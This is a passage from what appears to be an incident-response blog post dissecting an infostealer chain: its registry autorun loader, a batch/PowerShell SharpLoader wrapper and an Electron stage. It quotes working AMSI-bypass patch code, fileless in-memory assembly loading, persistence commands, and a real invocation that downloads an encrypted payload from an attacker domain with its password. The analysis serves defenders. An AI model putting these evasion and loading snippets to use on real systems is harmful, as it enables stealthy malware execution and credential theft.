with routine internet activity.",[12,9047,9048,9049,9051],{},"This stage ultimately confirmed the malware’s identity: a variant of ",[251,9050,8365],{},", known for its:",[1254,9053,9054,9057,9060,9063],{},[1257,9055,9056],{},"High modularity",[1257,9058,9059],{},"Runtime obfuscation",[1257,9061,9062],{},"Commercial distribution via Telegram",[1257,9064,9065],{},"Strong focus on credential harvesting and token-based session hijacking",[12,9067,9068,9069,9071],{},"Together with the earlier stages, ",[63,9070,8304],{}," formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.",[25,9073,9075,9076],{"id":9074},"_3-deep-dive-updaterexe","3. Deep Dive: ",[63,9077,8296],{},[12,9079,31],{},[12,9081,9082,9084],{},[63,9083,8296],{}," was the initial binary observed during post-compromise analysis. Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.",[41,9086,9088],{"id":9087},"_31-properties","3.1 Properties",[12,9090,47],{},[417,9092,9093,9101],{},[422,9094,9095],{},[426,9096,9097,9099],{},[430,9098,433],{},[430,9100,436],{},[438,9102,9103,9113,9123,9133,9143,9152],{},[426,9104,9105,9110],{},[443,9106,9107],{},[251,9108,9109],{},"Format:",[443,9111,9112],{},"Windows Portable Executable (PE32)",[426,9114,9115,9120],{},[443,9116,9117],{},[251,9118,9119],{},"Architecture:",[443,9121,9122],{},"x86-64",[426,9124,9125,9130],{},[443,9126,9127],{},[251,9128,9129],{},"Size:",[443,9131,9132],{},"~154 KB",[426,9134,9135,9140],{},[443,9136,9137],{},[251,9138,9139],{},"Entropy:",[443,9141,9142],{},"Normal (non-packed)",[426,9144,9145,9150],{},[443,9146,9147],{},[251,9148,9149],{},"Signatures:",[443,9151,4751],{},[426,9153,9154,9159],{},[443,9155,9156],{},[251,9157,9158],{},"VirusTotal Detection:",[443,9160,9161],{},"1/69 at time of analysis",[12,9163,9164],{},"The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.",[41,9166,9168],{"id":9167},"_32-behavioral-analysis","3.2 Behavioral Analysis",[12,9170,47],{},[12,9172,9173],{},[251,9174,9175],{},"No User Interaction Required",[12,9177,9178,9179,9181],{},"The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (",[63,9180,8296],{},") was launched automatically — most likely via a persistence mechanism such as a registry autorun key. However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.",[12,9183,9184],{},[251,9185,9186],{},"Silent Execution and Staging",[12,9188,9189,9190,9192,9193,9195],{},"Upon execution, ",[63,9191,8296],{}," immediately launched ",[63,9194,8300],{}," with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.",[12,9197,9198],{},[251,9199,9200],{},"Payload Deployment Behavior",[12,9202,9203,9205],{},[63,9204,8300],{}," was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:",[1254,9207,9208,9214],{},[1257,9209,9210,9211,9213],{},"The payload may have been bundled internally within ",[63,9212,8296],{}," (e.g., embedded resource), or",[1257,9215,9216],{},"It may have been retrieved from a remote source",[12,9218,9219],{},"Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.",[12,9221,9222],{},[251,9223,9224],{},"Process Chain Behavior",[12,9226,9227,9228,9230,9231,9233],{},"Once executed, ",[63,9229,8296],{}," spawned ",[63,9232,8300],{}," as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:",[56,9235,9238],{"className":9236,"code":9237,"language":61},[59],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[63,9239,9237],{"__ignoreMap":65},[12,9241,9242],{},"All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths. This minimized exposure and helped the malware remain undetected over an extended period.",[41,9244,9246],{"id":9245},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[12,9248,47],{},[12,9250,9251,9253,9254,9257,9258,1013],{},[63,9252,8296],{}," played a ",[251,9255,9256],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[63,9259,8300],{},[12,9261,9262],{},[251,9263,9264],{},"Confirmed Characteristics",[1254,9266,9267,9274,9279],{},[1257,9268,9269,9270,9273],{},"It ",[251,9271,9272],{},"did not"," contain or execute malicious logic directly",[1257,9275,9269,9276,9278],{},[251,9277,9272],{}," perform any data exfiltration",[1257,9280,9269,9281,9283],{},[251,9282,9272],{}," interact with browser credential stores or sensitive user data",[12,9285,9286,9287,9289],{},"Its sole purpose was to silently launch ",[63,9288,8300],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[12,9291,9292,9293,9295,9296,9298],{},"By acting as an isolated first-stage loader, ",[63,9294,8296],{}," ensured that the actual stealer payload (",[63,9297,8304],{},") remained concealed in deeper layers of execution. This separation of duties allowed the attackers to:",[1254,9300,9301,9304,9307],{},[1257,9302,9303],{},"Avoid correlation by static AV or sandbox systems",[1257,9305,9306],{},"Swap or update payloads without modifying the loader",[1257,9308,9309],{},"Reduce behavioral signals at the entry point",[12,9311,9312,9313,9316],{},"This pattern is typical in ",[251,9314,9315],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[12,9318,8711,9319,9321],{},[63,9320,8296],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[41,9323,9325],{"id":9324},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[12,9327,47],{},[12,9329,9330,9331,9333],{},"Static analysis of the Python payload revealed that ",[63,9332,8296],{}," is explicitly persisted using a registry autorun entry:",[1254,9335,9336,9344,9352],{},[1257,9337,9338,1061,9341],{},[251,9339,9340],{},"Registry Path",[63,9342,9343],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[1257,9345,9346,1061,9349],{},[251,9347,9348],{},"Value Name",[63,9350,9351],{},"Realtek Audio",[1257,9353,9354,1061,9357],{},[251,9355,9356],{},"Payload Path",[63,9358,9359],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[12,9361,9362],{},"The corresponding registry command is executed via PowerShell:",[56,9364,9368],{"className":9365,"code":9366,"language":9367,"meta":65,"style":65},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[63,9369,9370],{"__ignoreMap":65},[102,9371,9372],{"class":104,"line":105},[102,9373,9366],{},[12,9375,9376],{},"This ensures the malware is launched at every user login. The file is also marked with hidden and system attributes to further evade detection:",[56,9378,9380],{"className":9365,"code":9379,"language":9367,"meta":65,"style":65},"attrib +h +s \"Updater.exe\"\n",[63,9381,9382],{"__ignoreMap":65},[102,9383,9384],{"class":104,"line":105},[102,9385,9379],{},[12,9387,9388],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[41,9390,9392],{"id":9391},"_35-summary","3.5 Summary",[12,9394,47],{},[2110,9396,9397],{},[12,9398,9399,9400,9402],{},"While ",[63,9401,8296],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[52,9404],{"className":9405},[8535],[12,9407,9408],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[12,9410,9411,9412,9414,9415,9417,9418,9421],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[63,9413,8304],{}," payload, we identified logic that actively checked for the presence of ",[63,9416,8296],{},". This check was part of a broader ",[251,9419,9420],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[12,9423,9424,9425,9427,9428,9431],{},"This means that ",[63,9426,8296],{}," was not only responsible for initiating the malware, but also formed part of its ",[251,9429,9430],{},"ongoing runtime validation",". Without this stub, the malware could lose its ability to reinitialize in future sessions.",[12,9433,9434],{},[251,9435,9436,9437,1550],{},"Key Functions of ",[63,9438,8296],{},[1254,9440,9441,9446,9451,9454],{},[1257,9442,9443,9444],{},"Seamless deployment of ",[63,9445,8300],{},[1257,9447,9448,9449],{},"Indirect execution of ",[63,9450,8304],{},[1257,9452,9453],{},"Decoupling of loader and payload logic",[1257,9455,9456,9459],{},[251,9457,9458],{},"Referenced by the payload itself"," as part of operational health monitoring",[12,9461,9462],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[12,9464,9465,9466,9468],{},"For now, it is clear that ",[63,9467,8296],{}," served as both ignition and anchor point in this layered infostealer architecture.",[41,9470,9472],{"id":9471},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[12,9474,47],{},[12,9476,9477],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[12,9479,9480,9481,9483,9484,9486],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[63,9482,8296],{}," was present and executing, but ",[63,9485,8300],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[12,9488,9489,9490,9495,9496,9498],{},"We deliberately ",[251,9491,9492,9493],{},"deleted ",[63,9494,8300],{}," from the infected environment while leaving ",[63,9497,8296],{}," untouched. And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[12,9500,9501,9502,805,9504,9506,9507,9510,9511,9514,9515,805,9517,9520,9521,9523],{},"Here’s where it got interesting: Instead of directly recreating ",[63,9503,8300],{},[63,9505,8296],{}," first dropped a file named ",[63,9508,9509],{},"app-64.7z"," — a standard ",[251,9512,9513],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[63,9516,8300],{},[63,9518,9519],{},"resources",", and the ",[63,9522,8749],{}," payload with all embedded logic.",[12,9525,9526,9527,1013],{},"We had effectively ",[251,9528,9529],{},"forced the malware to hand us the source package",[12,9531,9532],{},[2642,9533],{"alt":9534,"src":9535},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[12,9537,9538],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[12,9540,9541,9542,9545],{},"This behavior strongly suggests that the attackers deliberately chose a ",[251,9543,9544],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[12,9547,9548],{},"And in our case? It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[12,9550,9551,9552],{},"Let’s just say: ",[251,9553,9554,9555,805,9558,9561],{},"sometimes the best forensic tools are ",[63,9556,9557],{},"del",[63,9559,9560],{},"wait",", and a little curiosity.",[25,9563,9565,9566],{"id":9564},"_4-deep-dive-powbat","4. Deep Dive: ",[63,9567,9568],{},"pow.bat",[12,9570,31],{},[12,9572,9573,9574,9577],{},"In the analyzed malware campaign, the component ",[63,9575,9576],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[41,9579,9581],{"id":9580},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[12,9583,47],{},[12,9585,9586,9587,9589],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[63,9588,9568],{}," shows the following characteristics based on static analysis:",[417,9591,9592,9600],{},[422,9593,9594],{},[426,9595,9596,9598],{},[430,9597,433],{},[430,9599,436],{},[438,9601,9602,9611,9620,9630,9639,9649,9659,9668],{},[426,9603,9604,9608],{},[443,9605,9606],{},[251,9607,9109],{},[443,9609,9610],{},"DOS Batch File",[426,9612,9613,9617],{},[443,9614,9615],{},[251,9616,9119],{},[443,9618,9619],{},"Script-based (not compiled binary)",[426,9621,9622,9627],{},[443,9623,9624],{},[251,9625,9626],{},"File Size:",[443,9628,9629],{},"27.79 KB (28454 bytes)",[426,9631,9632,9636],{},[443,9633,9634],{},[251,9635,9139],{},[443,9637,9638],{},"Normal (plain ASCII text)",[426,9640,9641,9646],{},[443,9642,9643],{},[251,9644,9645],{},"Magic:",[443,9647,9648],{},"DOS batch file, ASCII text",[426,9650,9651,9656],{},[443,9652,9653],{},[251,9654,9655],{},"Digital Signature:",[443,9657,9658],{},"None detected",[426,9660,9661,9665],{},[443,9662,9663],{},[251,9664,9158],{},[443,9666,9667],{},"26 / 61 (at time of analysis)",[426,9669,9670,9675],{},[443,9671,9672],{},[251,9673,9674],{},"Threat Labels:",[443,9676,9677,805,9680,805,9683,805,9685],{},[63,9678,9679],{},"trojan",[63,9681,9682],{},"downloader",[63,9684,9367],{},[63,9686,9687],{},"agentb",[12,9689,9690,9691,9694],{},"Despite being a simple ",[63,9692,9693],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[41,9696,9698,9699,1288],{"id":9697},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[63,9700,9701],{},"gofor4msi",[12,9703,47],{},[12,9705,9706],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[12,9708,9709,9710,9713,9714,9717,9718,9721,9722,9725,9726,7224],{},"In SharpLoader, the AMSI bypass is implemented through ",[251,9711,9712],{},"direct in-memory patching"," of the ",[63,9715,9716],{},"AmsiScanBuffer"," function within the ",[63,9719,9720],{},"amsi.dll",". This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[63,9723,9724],{},"AMSI_RESULT_DETECTED",") or safe (",[63,9727,9728],{},"AMSI_RESULT_CLEAN",[12,9730,9731],{},"The relevant in-memory patching code is:",[56,9733,9737],{"className":9734,"code":9735,"language":9736,"meta":65,"style":65},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[63,9738,9739,9744,9749,9754],{"__ignoreMap":65},[102,9740,9741],{"class":104,"line":105},[102,9742,9743],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[102,9745,9746],{"class":104,"line":111},[102,9747,9748],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[102,9750,9751],{"class":104,"line":329},[102,9752,9753],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[102,9755,9756],{"class":104,"line":346},[102,9757,9758],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[12,9760,9761],{},"This sequence performs the following steps:",[3259,9763,9764,9773,9784,9794],{},[1257,9765,9766,9769,9770,1013],{},[251,9767,9768],{},"Load the AMSI DLL"," into the process using ",[63,9771,9772],{},"LoadLibrary(\"amsi.dll\")",[1257,9774,9775,9778,9779,8305,9781,1013],{},[251,9776,9777],{},"Resolve the memory address"," of the function ",[63,9780,9716],{},[63,9782,9783],{},"GetProcAddress()",[1257,9785,9786,9789,9790,9793],{},[251,9787,9788],{},"Change the memory protection"," of the address using ",[63,9791,9792],{},"VirtualProtect()"," to make it writable.",[1257,9795,9796,9799,9800,9803],{},[251,9797,9798],{},"Overwrite the beginning of the function"," using ",[63,9801,9802],{},"Marshal.Copy()"," with a small shellcode patch.",[12,9805,9806],{},"The patch applied for 64-bit systems is:",[56,9808,9810],{"className":9734,"code":9809,"language":9736,"meta":65,"style":65},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[63,9811,9812],{"__ignoreMap":65},[102,9813,9814],{"class":104,"line":105},[102,9815,9809],{},[12,9817,9818],{},"This corresponds to the following instructions:",[1254,9820,9821,9830],{},[1257,9822,9823,9826,9827],{},[63,9824,9825],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[63,9828,9829],{},"E_INVALIDARG",[1257,9831,9832,9835],{},[63,9833,9834],{},"ret"," → immediately returns from the function",[12,9837,9838,9839,9841],{},"This effectively causes ",[63,9840,9716],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[12,9843,9844],{},"If executed on a 32-bit system, a different patch is applied:",[56,9846,9848],{"className":9734,"code":9847,"language":9736,"meta":65,"style":65},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[63,9849,9850],{"__ignoreMap":65},[102,9851,9852],{"class":104,"line":105},[102,9853,9847],{},[12,9855,9856],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[12,9858,9859,9860,805,9863,9866,9867,9870],{},"Using raw P/Invoke calls like ",[63,9861,9862],{},"LoadLibrary",[63,9864,9865],{},"GetProcAddress",", and ",[63,9868,9869],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. This method is compact, effective, and leaves minimal forensic artifacts.",[12,9872,9873,9874,9877],{},"In summary, this AMSI bypass technique is a ",[251,9875,9876],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[41,9879,9881],{"id":9880},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[12,9883,47],{},[12,9885,9886,9887,9890],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[63,9888,9889],{},"$location"," parameter.",[12,9892,9893,9894,9897,9898,9901,9902,9905,9906,9909,9910,9913],{},"If the location begins with ",[63,9895,9896],{},"http",", it is interpreted as a URL and the loader uses ",[63,9899,9900],{},"Get_Stage2()"," to download the payload via ",[63,9903,9904],{},"HttpWebRequest",". If it is a local path, ",[63,9907,9908],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[251,9911,9912],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[12,9915,9916,9917,9920],{},"The loader then performs a ",[251,9918,9919],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[3259,9922,9923,9929,9939,9949],{},[1257,9924,9925,9928],{},[251,9926,9927],{},"Base64 Decoding",": Converts the encoded string into raw bytes. This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[1257,9930,9931,9934,9935,9938],{},[251,9932,9933],{},"GZip Decompression",": The decoded bytes are passed to a ",[63,9936,9937],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[1257,9940,9941,9944,9945,9948],{},[251,9942,9943],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[63,9946,9947],{},"Rfc2898DeriveBytes",") and a static salt.",[1257,9950,9951,9954],{},[251,9952,9953],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[12,9956,9957],{},"The decryption pipeline is executed like so:",[56,9959,9961],{"className":9734,"code":9960,"language":9736,"meta":65,"style":65},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[63,9962,9963,9968],{"__ignoreMap":65},[102,9964,9965],{"class":104,"line":105},[102,9966,9967],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[102,9969,9970],{"class":104,"line":111},[102,9971,9972],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[12,9974,9975,9976,9979],{},"Here, ",[63,9977,9978],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[12,9981,9982],{},[251,9983,9984],{},"Key Design Observations:",[1254,9986,9987,9990,9993],{},[1257,9988,9989],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the password non-trivial.",[1257,9991,9992],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[1257,9994,9995],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[12,9997,9998],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. Without either live execution or deep inspection of the loader behavior, defenders are unlikely to uncover the embedded payload without also knowing the password and exact decoding logic.",[41,10000,10002],{"id":10001},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[12,10004,47],{},[12,10006,10007],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[56,10009,10011],{"className":9734,"code":10010,"language":9736,"meta":65,"style":65},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[63,10012,10013,10018],{"__ignoreMap":65},[102,10014,10015],{"class":104,"line":105},[102,10016,10017],{},"Assembly a = Assembly.Load(bin);\n",[102,10019,10020],{"class":104,"line":111},[102,10021,10022],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[12,10024,10025,10026,10029],{},"This technique is referred to as ",[251,10027,10028],{},"fileless execution",". It is highly evasive because it:",[1254,10031,10032,10035,10038],{},[1257,10033,10034],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[1257,10036,10037],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[1257,10039,10040],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[12,10042,10043,10044,10047,10048,10051],{},"If the ",[63,10045,10046],{},"EntryPoint"," is not ",[63,10049,10050],{},"static",", the loader includes a fallback logic:",[56,10053,10055],{"className":9734,"code":10054,"language":9736,"meta":65,"style":65},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[63,10056,10057,10062,10067,10072,10077,10082],{"__ignoreMap":65},[102,10058,10059],{"class":104,"line":105},[102,10060,10061],{},"MethodInfo method = a.EntryPoint;\n",[102,10063,10064],{"class":104,"line":111},[102,10065,10066],{},"if (method != null)\n",[102,10068,10069],{"class":104,"line":329},[102,10070,10071],{},"{\n",[102,10073,10074],{"class":104,"line":346},[102,10075,10076],{},"    object o = a.CreateInstance(method.Name);\n",[102,10078,10079],{"class":104,"line":650},[102,10080,10081],{},"    method.Invoke(o, null);\n",[102,10083,10084],{"class":104,"line":656},[102,10085,10086],{},"}\n",[12,10088,10089,10090,10093],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[63,10091,10092],{},"public int Main()"," inside a class instance). The code dynamically creates an instance of the class and then calls the entry point method.",[12,10095,10096],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[41,10098,10100],{"id":10099},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[12,10102,47],{},[12,10104,10105,10106,10108],{},"The PowerShell function ",[63,10107,9576],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[12,10110,10111],{},[251,10112,10113],{},"Supported Parameters:",[1254,10115,10116,10122,10128,10148],{},[1257,10117,10118,10121],{},[63,10119,10120],{},"-location"," (mandatory): Specifies either a URL or a local file path to the stage two encrypted payload.",[1257,10123,10124,10127],{},[63,10125,10126],{},"-password"," (mandatory): Used to derive the AES decryption key.",[1257,10129,10130,805,10133,805,10136,10139,10140,10143,10144,10147],{},[63,10131,10132],{},"-argument",[63,10134,10135],{},"-argument2",[63,10137,10138],{},"-argument3"," (optional): These are forwarded directly to the ",[63,10141,10142],{},".NET"," assembly’s ",[63,10145,10146],{},"Main()"," method via reflection.",[1257,10149,10150,10153],{},[63,10151,10152],{},"-noArgs",": Triggers execution without passing any parameters to the second-stage payload.",[12,10155,10156],{},"Internally, the arguments are collected and forwarded like this:",[56,10158,10160],{"className":9365,"code":10159,"language":9367,"meta":65,"style":65},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[63,10161,10162,10167],{"__ignoreMap":65},[102,10163,10164],{"class":104,"line":105},[102,10165,10166],{},"object[] cmd = args.Skip(2).ToArray();\n",[102,10168,10169],{"class":104,"line":111},[102,10170,10171],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[12,10173,10174],{},"This means that the .NET payload is expected to have a signature like:",[56,10176,10178],{"className":9734,"code":10177,"language":9736,"meta":65,"style":65},"static void Main(string[] args)\n",[63,10179,10180],{"__ignoreMap":65},[102,10181,10182],{"class":104,"line":105},[102,10183,10177],{},[12,10185,10186,10187,10189],{},"or it will gracefully fall back to the parameterless ",[63,10188,10146],{}," variant via fallback logic. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[12,10191,10192],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[41,10194,10196],{"id":10195},"_46-real-world-usage-example","4.6 Real-World Usage Example",[12,10198,47],{},[12,10200,10201],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[56,10203,10205],{"className":9365,"code":10204,"language":9367,"meta":65,"style":65},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[63,10206,10207],{"__ignoreMap":65},[102,10208,10209],{"class":104,"line":105},[102,10210,10204],{},[12,10212,10213],{},"This example highlights the typical use case of SharpLoader:",[1254,10215,10216,10230,10242,10252],{},[1257,10217,10218,10221,10222,10225,10226,10229],{},[251,10219,10220],{},"Location Argument",": The URL points to a remote server hosting ",[63,10223,10224],{},"calc.enc",", a concealed second-stage payload. The endpoint is located under a legitimate-looking ",[63,10227,10228],{},".well-known"," directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.",[1257,10231,10232,1061,10235,10237,10238,10241],{},[251,10233,10234],{},"Payload Characteristics",[63,10236,10224],{}," is a ",[251,10239,10240],{},"triple-obfuscated file"," — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.",[1257,10243,10244,10247,10248,10251],{},[251,10245,10246],{},"Password Argument",": The string ",[63,10249,10250],{},"UwUFufu1"," is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.",[1257,10253,10254,10257,10258,10260],{},[251,10255,10256],{},"No Additional Arguments",": The ",[63,10259,10152],{}," switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.",[12,10262,10263,10264,10267],{},"This stealthy invocation chain encapsulates SharpLoader’s core purpose: ",[251,10265,10266],{},"fileless, adaptive, and secure payload delivery"," through simple PowerShell syntax with maximum obfuscation and evasion.",[41,10269,10271],{"id":10270},"_47-summary","4.7 Summary",[12,10273,47],{},[12,10275,399,10276,10278],{},[63,10277,9576],{}," construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.",[12,10280,10281],{},[251,10282,10283],{},"Key Highlights:",[1254,10285,10286,10295,10301,10307],{},[1257,10287,10288,10291,10292,10294],{},[251,10289,10290],{},"Bypassing AMSI",": Direct in-memory patching of ",[63,10293,9716],{}," disables antivirus inspection without invoking detectable APIs.",[1257,10296,10297,10300],{},[251,10298,10299],{},"Secure Payload Handling",": Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.",[1257,10302,10303,10306],{},[251,10304,10305],{},"Memory-Only Execution",": Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.",[1257,10308,10309,10312],{},[251,10310,10311],{},"Modular and Reusable Architecture",": Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.",[25,10314,10316,10317,10319],{"id":10315},"_5-deep-dive-mainexe-electron-based-malware-loader","5. Deep Dive: ",[63,10318,8300],{}," – Electron-Based Malware Loader",[12,10321,31],{},[12,10323,10324,10325,10327,10328,10331,10332,10334,10335,10337],{},"During reverse engineering, it became clear that ",[63,10326,8300],{},", flagged by Microsoft Defender for Endpoint, was not a conventional binary but an ",[251,10329,10330],{},"Electron-based malware loader",". It was delivered inside an archive named ",[63,10333,9509],{},", which ",[63,10336,8296],{}," downloaded and extracted at runtime. Once unpacked, the structure and contents strongly resembled a typical Electron application.",[41,10339,10341],{"id":10340},"_51-recognizing-electron-structure","5.1 Recognizing Electron Structure",[12,10343,47],{},[12,10345,10346],{},"The extracted folder included files such 